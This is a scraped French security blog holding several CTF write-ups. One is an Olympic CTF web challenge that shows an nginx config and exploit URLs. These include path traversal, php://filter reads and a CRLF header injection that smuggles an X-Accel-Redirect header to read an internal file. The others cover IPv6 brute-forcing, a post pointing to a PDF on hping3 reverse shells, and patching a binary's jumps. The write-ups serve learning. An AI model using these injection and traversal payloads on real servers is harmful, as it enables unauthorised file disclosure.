<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZrX-wejMcVxSSnHagLCQOJQi-4RMYWyuSOJQeR5cFdpRwsv2Gn8s6eu_zhU0o4DhlR_D79zDC-rCl2Wz_sl6M46uqB3YwM67pCCsFJxMum7K_BR5k5kNfsxmjJyoigZq1pYfvIt6hO2lu/s1600/lfi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZrX-wejMcVxSSnHagLCQOJQi-4RMYWyuSOJQeR5cFdpRwsv2Gn8s6eu_zhU0o4DhlR_D79zDC-rCl2Wz_sl6M46uqB3YwM67pCCsFJxMum7K_BR5k5kNfsxmjJyoigZq1pYfvIt6hO2lu/s1600/lfi.png" height="59" width="320" /></a></div>
<div style="background-color: white; box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; margin-bottom: 10px; text-align: left;">
<br /></div>
<div style="background-color: white; box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; margin-bottom: 10px; text-align: left;">
La on s'est dis: super \o/ , d'autant que /proc/self/environ étant aussi accessible.. oui mais voila, cette piste la nous aura fait d'hors et déja perdre énormément de temps avant que l'on comprenne qu'il s'agissait plus d'un file disclosure qu'autre chose!</div>
<div style="background-color: white; box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; margin-bottom: 10px; text-align: left;">
Comment l'a-t-on découvert?</div>
<div style="background-color: white; box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; margin-bottom: 10px; text-align: left;">
Comme ceci:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKirfsiYbYbhNtFe_A3Jf920gOt8ckvbC7Rrwn0681AY8tEEast8TGVS_DZCFqBHWbg2K0ccU1GgAlQqqKPACFlNPFDPHBi5yrEr8BxCkX2kX3OyBSv-JgRu-L74tL-9ikufe8ij4z519r/s1600/conf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKirfsiYbYbhNtFe_A3Jf920gOt8ckvbC7Rrwn0681AY8tEEast8TGVS_DZCFqBHWbg2K0ccU1GgAlQqqKPACFlNPFDPHBi5yrEr8BxCkX2kX3OyBSv-JgRu-L74tL-9ikufe8ij4z519r/s1600/conf.png" height="68" width="320" /></a></div>
<div style="background-color: white; box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; margin-bottom: 10px; text-align: left;">
<br /></div>
<div style="background-color: white; box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; margin-bottom: 10px; text-align: left;">
une fois ré-indenté cela donne quelque chose comme:</div>
<div style="background-color: white; box-sizing: border-box; margin-bottom: 10px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="color: purple; font-size: 14px; line-height: 20px;"><i>#listen 80; ## listen for ipv4; this line is default and implied</i></span></span></div>
<div style="background-color: white; box-sizing: border-box; margin-bottom: 10px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="color: purple; font-size: 14px; line-height: 20px;"><i>#listen [::]:80 default ipv6only=on; ## listen for ipv6</i></span></span></div>
<div style="background-color: white; box-sizing: border-box; margin-bottom: 10px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="color: purple; font-size: 14px; line-height: 20px;"><i> root /usr/share/nginx/www;</i></span></span></div>
<div style="background-color: white; box-sizing: border-box; margin-bottom: 10px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="color: purple; font-size: 14px; line-height: 20px;"><i> index index.html index.htm;</i></span></span></div>
<div style="background-color: white; box-sizing: border-box; margin-bottom: 10px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="color: purple; font-size: 14px; line-height: 20px;"><i> # Make site accessible from http://localhost/</i></span></span></div>
<div style="background-color: white; box-sizing: border-box; margin-bottom: 10px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="color: purple; font-size: 14px; line-height: 20px;"><i> server_name localhost;</i></span></span></div>
<div style="background-color: white; box-sizing: border-box; margin-bottom: 10px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="color: purple; font-size: 14px; line-height: 20px;"><i> location / {</i></span></span></div>
<div style="background-color: white; box-sizing: border-box; margin-bottom: 10px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="color: purple; font-size: 14px; line-height: 20px;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> limit_req zone=one burst=5 nodelay;</i></span></span></div>
<div style="background-color: white; box-sizing: border-box; margin-bottom: 10px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="color: purple; font-size: 14px; line-height: 20px;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> proxy_pass http://127.0.0.1:5001;</i></span></span></div>
<div style="background-color: white; box-sizing: border-box; margin-bottom: 10px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="color: purple; font-size: 14px; line-height: 20px;"><i> }</i></span></span></div>
<div style="background-color: white; box-sizing: border-box; margin-bottom: 10px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="color: purple; font-size: 14px; line-height: 20px;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span>location = /secret/flag {</i></span></span></div>
<div style="background-color: white; box-sizing: border-box; margin-bottom: 10px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="color: purple; font-size: 14px; line-height: 20px;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> root /home;</i></span></span></div>
<div style="background-color: white; box-sizing: border-box; margin-bottom: 10px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="color: purple; font-size: 14px; line-height: 20px;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> internal;</i></span></span></div>
<div style="background-color: white; box-sizing: border-box; margin-bottom: 10px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="color: purple; font-size: 14px; line-height: 20px;"><i><span class="Apple-tab-span" style="white-space: pre;"> </span> }</i></span></span></div>
<div style="background-color: white; box-sizing: border-box; margin-bottom: 10px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="color: purple; font-size: 14px; line-height: 20px;"><i> }</i></span></span></div>
<div style="background-color: white; box-sizing: border-box; margin-bottom: 10px;">
<br /></div>
<div style="background-color: white; box-sizing: border-box; margin-bottom: 10px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 14px; line-height: 20px;">C'est à ce moment la qu'on compris qu'il fallait exploiter cela différemment : reverse proxy inside!! </span></span></div>
<div style="background-color: white; box-sizing: border-box; margin-bottom: 10px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 14px; line-height: 20px;">En effet, configuré de la sorte nous n'aurions jamais les droits pour lire le fichier!!</span></span></div>
<div style="background-color: white; box-sizing: border-box; margin-bottom: 10px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 14px; line-height: 20px;">Quelques recherches plus tard on est donc parti sur des centaines de tests différent concernant un <i>internal redirec</i>t (127.0.0.1:5001), en voici quelques exemple afin de vous donner des idées le cas échéant:</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 14px; line-height: 20px;"><b>...</b></span></span></div>
<div style="background-color: white; box-sizing: border-box; margin-bottom: 10px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;">http://109.233.61.11:27280/?retpath=http://127.0.0.1:5001/?f=/home/secret/flag</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 14px; line-height: 20px;">http://109.233.61.11:27280/?retpath=http://109.233.61.11:27280/news/?f=../../../../../../../home/secret/flag</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 14px; line-height: 20px;">http://109.233.61.11:27280/?retpath=http://127.0.0.1:5001/?f=php://filter/convert.base64-encode/resource=../../../../../../../../../../secret/flag</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 14px; line-height: 20px;">http://109.233.61.11:27280/?retpath=http://127.0.0.1:5001/?f=/home/secret/flag</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;">http://109.233.61.11:27280/?retpath=http://127.0.0.1:5001/secret/flag</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><b>...</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 14px; line-height: 20px;">Au final la solution et nous l'avion tenté via les headers sans succès etait :</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 14px; line-height: 20px;"><b>http://109.233.61.11:27280/?retpath=/secret/flag%0AX-Accel-Redirect:%20/secret/flag</b></span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 14px; line-height: 20px;"><b><br /></b></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQh_xnTjZLrhoUVi6yaGk6qkkt6jCX1XxXp-HBQOgk9axKrw4BM2m31eRD6mtRvj0G_Lwa3fZ9VFhimCBznCANycefhAL_dEtSBaLA48hpjrqkdVNucLK5IX4ZyubyE8NWhZpFf2h4RnUJ/s1600/flag_web2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQh_xnTjZLrhoUVi6yaGk6qkkt6jCX1XxXp-HBQOgk9axKrw4BM2m31eRD6mtRvj0G_Lwa3fZ9VFhimCBznCANycefhAL_dEtSBaLA48hpjrqkdVNucLK5IX4ZyubyE8NWhZpFf2h4RnUJ/s1600/flag_web2.jpg" height="40" width="320" /></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 14px; line-height: 20px;"><b><br /></b></span></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 14px; line-height: 20px;">Nous l'avions quasiment trouvé mais encore fallait-il penser à utiliser X-Accel-Redirect directement dans l'url !!</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 14px; line-height: 20px;"><br /></span></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 14px; line-height: 20px;">Voici un des quelques liens sur Nginx et son module internal que nous avions utilisé:</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 14px; line-height: 20px;"><a href="http://nginx.org/en/docs/http/ngx_http_core_module.html#internal" target="_blank">nginx.org</a></span></span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 14px; line-height: 20px;">La suite se trouvant sur google à vous de rechercher si l'occasion se présente mais surtout surtout laisser aller l'imagination car perso jamais je n'aurait pensé à mettre ceci dans l'url tel quel !</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 14px; line-height: 20px;"><br /></span></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 14px; line-height: 20px;">Enjoy!</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px;"><br /></span></div>
<div style="background-color: white; box-sizing: border-box; margin-bottom: 10px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 14px; line-height: 20px;"><br /></span></span></div>
<div style="background-color: white; box-sizing: border-box; margin-bottom: 10px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 14px; line-height: 20px;"><br /></span></span></div>
<div style="background-color: white; box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; margin-bottom: 10px; text-align: left;">
<br /></div>
kmkzhttp://www.blogger.com/profile/11354372095868320290noreply@blogger.com3tag:blogger.com,1999:blog-4457623080129847893.post-20855194059763025292014-02-09T17:42:00.000+01:002014-02-09T18:52:04.059+01:00[Write Up] Out there: Curling 10 (Olympic-CTF)Salut à tous, ce week end avait lieu l'Olympic CTF auquel nous avons participé avec nombre de personne de la team Sec0d.<br />
<br />
Malgrès nos efforts nous ne nous sommes que peu classé alors que certains challenge (Curl200 entre autre) étaient quasiment bouclé ce qui est trés frustrant mais finalement on aura passé un bon week end su ce CTF de qualité !<br />
<br />
J'ai hésité à publier ce petit write up puis me suis dis que la partie importante de ce dernier (car sans ça il perd tout son intérêt) était la petite partie IPV6.<br />
<br />
<div style="text-align: left;">
En effet, l'intitulé était: </div>
<div style="text-align: center;">
<i style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; text-align: center;"><span style="color: blue;">Flag is out there:</span></i></div>
<div style="background-color: white; box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; margin-bottom: 10px; text-align: center;">
<div style="text-align: center;">
<i><span style="color: blue;">http://[2a02:6b8:0:141f:fea9:d5ff:fed5:XX01]/</span></i></div>
</div>
<div style="background-color: white; box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; margin-bottom: 10px; text-align: center;">
<div style="text-align: center;">
<i style="box-sizing: border-box;"><span style="color: blue;">Flag format: CTF{..32 hexes..}</span></i></div>
</div>
<div style="background-color: white; box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; margin-bottom: 10px; text-align: left;">
le message est clair: il nous faut trouver le bon link en bruteforçant l'octet incriminé.</div>
<div style="background-color: white; box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; margin-bottom: 10px; text-align: left;">
Oui mais voila, nous devront travaillé en IPV6 et étant sur un CTF on aimerait faire vite pour scorer et passer à autre chose!!</div>
<div style="background-color: white; box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; margin-bottom: 10px; text-align: left;">
J'ai donc opté pour la facilité (comme toujours) : l'encapsulation IPV6 en UDP IPV4 et ... certains tools sous Kali sont la pour nous faire ça en 2 temps, trois mouvement et c'est bon à savoir ! ;-)</div>
<div style="background-color: white; box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; margin-bottom: 10px; text-align: left;">
Le lien vers le tutorial complet est dispo en fin d'article mais voici comment procéder:</div>
<div style="background-color: white; box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; margin-bottom: 10px; text-align: left;">
dans le shell saisissez le commande <i>miredo </i>puis faites un <i>ifconfig teredo </i>(teredo étant l'interface créée par miredo) et voila, votre encapsulation IPV6 est en place, le reste est facile et est illustré ci-dessous avec en prime le script disponible en fin d'aticle.</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVSf9Z6y6Ao2mfzyQiT0TCaURZgCfkDlU5N_q98faBb38Bh6Bv8bJrwHAMbHJF6X1FyFpg-ZtPPSCiWwDqsWiEcbNM_pSLtIgqpoAyqpePPZ24O9pyw7ZRbBmGqvnq9z2ztLTbD66fUze1/s1600/miredo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVSf9Z6y6Ao2mfzyQiT0TCaURZgCfkDlU5N_q98faBb38Bh6Bv8bJrwHAMbHJF6X1FyFpg-ZtPPSCiWwDqsWiEcbNM_pSLtIgqpoAyqpePPZ24O9pyw7ZRbBmGqvnq9z2ztLTbD66fUze1/s1600/miredo.png" height="184" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="background-color: white; box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; margin-bottom: 10px; text-align: left;">
Bien sûr ce script n'est pas des plus propre dans le sens ou, dans un soucis de gain de temps j'ai utiliser un appel à wget ce qui m'a permis de le laisser tourner en tâche de fond afin de commencer à exploiter le <b>curl200</b> et ses "<i>files disclosure"</i> et "<i>internal redirect"</i>.</div>
<div style="background-color: white; box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; margin-bottom: 10px; text-align: left;">
Un challenge sur lequel nous avons passé énormément de temps et pour lequel j'ai hâte de voir les writes-ups.</div>
<div style="background-color: white; box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; margin-bottom: 10px; text-align: left;">
Enfin, continuons notre bruteforce IPV6 pour le moment:</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="background-color: white; box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; margin-bottom: 10px; text-align: left;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTp4mU4XxLsRcqHDXdHRVVBCeLZZD3x52m9lOvlO8ZZoKNy0FF1YuxgwAb5Vpp6jHHHKtq3h3lfGfyL4muoU14ioP9XY9tFUJned0kKYnK_-ufUby1tic6LHRXuE65ubIrWk3rQa4l1LUx/s1600/screen1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTp4mU4XxLsRcqHDXdHRVVBCeLZZD3x52m9lOvlO8ZZoKNy0FF1YuxgwAb5Vpp6jHHHKtq3h3lfGfyL4muoU14ioP9XY9tFUJned0kKYnK_-ufUby1tic6LHRXuE65ubIrWk3rQa4l1LUx/s1600/screen1.png" height="205" width="400" /></a></div>
<br /></div>
<div style="background-color: white; box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 20px; margin-bottom: 10px; text-align: left;">
Et voila, reste qu'a lire ce fichier pour trouver en bas de page :</div>
<div style="background-color: white; box-sizing: border-box; margin-bottom: 10px;">
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small; line-height: 20px;">
</span></blockquote>
</div>
<div style="background-color: white; box-sizing: border-box; margin-bottom: 10px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 14px; line-height: 20px;">Script disponible <a href="https://drive.google.com/file/d/0B0FNzRUV7yjwMXlldjJYWjZrdnc/edit?usp=sharing" target="_blank">ici</a> pour les curieux! ;-)</span></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 14px; line-height: 20px;"><br /></span></span>
<br />
<blockquote class="tr_bq">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 14px; line-height: 20px;"><br /></span></span></blockquote>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 14px; line-height: 20px;"><br /></span></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="font-size: 14px; line-height: 20px;">Ressources "miredo" de chez la communautée Kali: <a href="http://www.coyotus.com/viewtopic.php?id=488" target="_blank">ici</a></span></span></div>
<div>
<br /></div>
kmkzhttp://www.blogger.com/profile/11354372095868320290noreply@blogger.com0tag:blogger.com,1999:blog-4457623080129847893.post-82840360827389902014-01-19T16:28:00.002+01:002014-01-19T16:28:51.818+01:00UDP reverse shell et firewall bypassing via hping3Salut à tous!<br />
<br />
Déja commençons comme il se doit avec un bonne année etc...<br />
<br />
Bref, pourquoi encore un paper sur hping3 alors que cela, j'en conviens n'a rien d'extraordinaire et sent le réchauffé.<br />
<br />
Tout simplement parceque depuis quelques mois maintenant j'ai pas mal de demande concernant les utilisations possible de hping3.<br />
<br />
En effet, je sais que de la doc existe oui mais .. et alors?<br />
J'aurais pu faire un article sur le RoP ou les protections GCC/kernel actuelles mais honnêtement ça, ça ne vous semble pas encore plus vu re-vu et réchauffé ? ;-)<br />
<br />
D'autant que ça ne serait pas à la hauteur de l'existant enfin bref, passons à hping3 et mon titre accrocheur.<br />
<br />
En 2008 j'avais déja publié un article sur hping (V.2 à l'époque) sur lequel au final on apprennait qu'il permettait déja certaines choses simpas.<br />
<br />
C'est cool mais ayant évolué et ayant eu pas mal de demande à ce sujet, j'ai un petit peu travaillé dessus et je dois avouer qu'il offre bien de possibilités et certaines trés avancés !<br />
<br />
Cet article aura donc pour objectif de vous donner les ficelles nécéssaires à une réflexion autour de l'outils et, bien entendu, de vous faire une petite démonstration de ce dernier au travers d'un scénario testé en LAN qui peux avec un peu de réflexion être appliqué à bien d'autres cas... à vous de faire preuve d'imagination!<br />
<br />
Il ne s'agit donc pas d'une documentation complète sur les possibilité de l'outils néanmoins je pense qu'aprés lecture certains aurons des idées de ce qui est réalisable et peut être que cela vous servira... qui sait ?<br />
<a href="https://drive.google.com/file/d/0B0FNzRUV7yjwd2JGRGpNOGcyWms/edit?usp=sharing" target="_blank"><br /></a>
<a href="https://drive.google.com/file/d/0B0FNzRUV7yjwd2JGRGpNOGcyWms/edit?usp=sharing" target="_blank">Lien vers le PDF de l'article</a><br />
<br />
N'hésitez pas à donner vos avis ou vos interrogations.<br />
Merci à tous !<br />
<br />
kmkz <br />
<br />kmkzhttp://www.blogger.com/profile/11354372095868320290noreply@blogger.com0tag:blogger.com,1999:blog-4457623080129847893.post-18116290783132638342012-12-16T20:27:00.001+01:002012-12-18T16:03:29.361+01:00[Write-up] PHDays CTF (Quals) Bin100Me revoilà!!<br />
<br />
Après tant d'absence non, je ne suis pas mort !<br />
Plutôt pas mal occupé sur Toulouse ou je bosse désormais mais jamais bien loin du monde de la sécu ;-) !<br />
<br />
Ainsi, je me suis pas mal remis aux CTF depuis peu avec mes confères d'ou ce petit post de "reprise d'activité" du blog .<br />
<br />
Bon, je me suis pas foulé sur ce coup, je le reconnais mais je commence à avoir des idées d'articles qui germent dans ma 'tite tête alors en attendant voici un petit writeup des plus simple mais bon...<br />
Comme souvent ici il est question de R.E.<br />
<br />
Le CTF était de type "Jeopardy" : il fallait DL les challenges sur l'adresse<a href="http://quals.phdays.com/" target="_blank"><span style="color: #f6b26b;"> quals.phdays.com</span></a> puis POUTRER !<br />
<br />
Je me suis donc dis que les catégories Bin et Pwn étaient pour moi .<br />
Cela dis, j'ai jeter un oeil ailleurs aussi, forcément.. C'était plutôt pas mal avec de l'audit de source PHP et requêtes SQL (voir en fin d'article) en passant par un puzzle à résoudre ou encore du R.E avancé sous Bochs, bref, du pur bonheur !!<br />
<br />
Bon, passons au sujet traité ici: le bin100:<br />
On DL une archive<span style="color: #6fa8dc;"> </span><span style="color: red;">.zip</span>, un petit <span style="color: red;">unzip </span>dessus et on se retrouve avec un binaire "discret" appelé simplement <span style="color: #6fa8dc;">.</span><span style="color: red;">exe</span> que j'ai rapidement renommé <span style="color: red;">bin1.exe</span>.<br />
<br />
En premier lieu je lance la bête afin de le voir à l'oeuvre et de prendre en compte les éventuels outputs renvoyés:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7FuqNpyT-2nrvMSYASHWap6QTaXEAI8-SPZgkM8HOlI4jdnbur63GflM710fuGsAdFQI5o3K5_dPKqAyOypntYWogwhFL9OWXlpqhYbPjeFgHw5wvE2QhUchzJpTf7v9Htvjmk2jr9gpw/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7FuqNpyT-2nrvMSYASHWap6QTaXEAI8-SPZgkM8HOlI4jdnbur63GflM710fuGsAdFQI5o3K5_dPKqAyOypntYWogwhFL9OWXlpqhYbPjeFgHw5wvE2QhUchzJpTf7v9Htvjmk2jr9gpw/s640/1.PNG" width="640" /></a></div>
<br />
A partir de la j'ai tout naturellement sortie Ida et me suis dis "oups ": à la seule vue du code ASM on pige direct qu'il y a un packer la dessous alors.. PeID !<br />
Ouf, fausse alerte enfin, si , packé mais un simple UPX donc<span style="color: red;"> upx -d bin1.exe</span>, on check et ok, unpacked.<br />
A partir de la c'est du classique on lance notre désassembleur préféré HT \o/ :<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnsJJbxxaApEEM8zFx8sBMW_yhI1QzcyD3_xA0qqrvEkyPbX-bAldwGVlqiTt3-b0cvIizjY9AOQl30vYPMX4DVCegcuh-tIiW8mOdC2oCndkCQ3aLO_B9WAqbFeTzqgxmizKGJI_DVXLP/s1600/Screenshot-3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnsJJbxxaApEEM8zFx8sBMW_yhI1QzcyD3_xA0qqrvEkyPbX-bAldwGVlqiTt3-b0cvIizjY9AOQl30vYPMX4DVCegcuh-tIiW8mOdC2oCndkCQ3aLO_B9WAqbFeTzqgxmizKGJI_DVXLP/s640/Screenshot-3.png" width="640" /></a></div>
<br />
Ok de la on a notre<span style="color: #ffe599;"> </span><span style="color: red;">EP (Entry Point)</span> donc ne fait plus que suivre à partir de l'adresse ou le binaire "jumpe" puis on regarde attentivement le code ASM en réalisant un dump ou encore avec un arbre des appels de fonctions, ce que fait très bien IdaPro:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrIsCIXBH1ouIBhcua1WGRJduQ2S5k5oWfoid1SzTk0h_zuXLtud-YDD_-wZb1kDCS4IKrE6tB6Q6lE0d5UFEP4Ooc4WkL8l1KH_mjVvlE2fTtPwp5LR8kThqwzT-Ku90_spRkhoBWbOIW/s1600/before.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrIsCIXBH1ouIBhcua1WGRJduQ2S5k5oWfoid1SzTk0h_zuXLtud-YDD_-wZb1kDCS4IKrE6tB6Q6lE0d5UFEP4Ooc4WkL8l1KH_mjVvlE2fTtPwp5LR8kThqwzT-Ku90_spRkhoBWbOIW/s640/before.png" width="640" /></a></div>
<br />
Bon donc la c'est carrément easy, si vous etes des assidus de mon blog vous devriez savoir ce qu'il reste à faire..non?<br />
<br />
Simple pourtant ! On vois clairement les conditions à bypasser afin de tomber sur le <span style="color: #ffe599;">"Get_your_flag</span>" (explicite n'est-ce pas) ce que nous allons d'ailleurs faire immédiatement car le but est de valider un flag hein ;-) .<br />
On va donc faire comme tout bon newbie et venir transformer nos<span style="color: red;"> JZ</span> en<span style="color: red;"> JNZ</span>, chmoder le binaire (<span style="color: red;">+x</span>) et voir si notre intuition est la bonne auquel cas on aura poutrer ce premier challenge en 2 minutes chrono !!<br />
<br />
Les modifications apportées ( je ne reviendrai pas sur le comment car tout est expliquer ailleurs sur mon blog), voici ce que l'on obtiens sous HTeditor:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq0e9FyZxkRpgQKWCHLsRqn_o_IpGxX9szrkXn2h2yKXIpvNYInY5p6rIsGQHrf0R5ZXzhve2L0q6D4JsCIKHanCwgCIlCXnaik028g4kaTZ_KJXWuwie6ckjLzbM4VyWsPZkEss-glz3l/s1600/patched.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq0e9FyZxkRpgQKWCHLsRqn_o_IpGxX9szrkXn2h2yKXIpvNYInY5p6rIsGQHrf0R5ZXzhve2L0q6D4JsCIKHanCwgCIlCXnaik028g4kaTZ_KJXWuwie6ckjLzbM4VyWsPZkEss-glz3l/s640/patched.png" width="640" /></a></div>
<br />
Ou sous Ida avec un beau graphe de fonctions:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjb8sEtSZ1zh9hytlI_Dgt3rk0y21L6KGgE_1jCNKqym-mp2kxGUwVBLZsslVOe86hAN3SEPArSdIAtEa7esm_XxCHowLW7LtPu9-b3qEh1otR7Ur92M47xhsqy8xWFfC9joWKNEjS5GjwB/s1600/patched_.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjb8sEtSZ1zh9hytlI_Dgt3rk0y21L6KGgE_1jCNKqym-mp2kxGUwVBLZsslVOe86hAN3SEPArSdIAtEa7esm_XxCHowLW7LtPu9-b3qEh1otR7Ur92M47xhsqy8xWFfC9joWKNEjS5GjwB/s640/patched_.png" width="640" /></a></div>
<br />
So, à présent exécutons notre binaire modifier pour vérifier tout cela..<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF9D6m-tcHN5juB22DA8R_cdT0pNqdEZh1jAzO6ZQsthox0YKmOl9py4fPAleQSHvBqlJAqyKubcinbWTFhnP6AUE5Ez7fs_q6_TS87AlpManuxYV1qtlyAmBsOfZ2959EJtx2P9NlgqQS/s1600/2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="321" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF9D6m-tcHN5juB22DA8R_cdT0pNqdEZh1jAzO6ZQsthox0YKmOl9py4fPAleQSHvBqlJAqyKubcinbWTFhnP6AUE5Ez7fs_q6_TS87AlpManuxYV1qtlyAmBsOfZ2959EJtx2P9NlgqQS/s640/2.PNG" width="640" /></a></div>
<br />
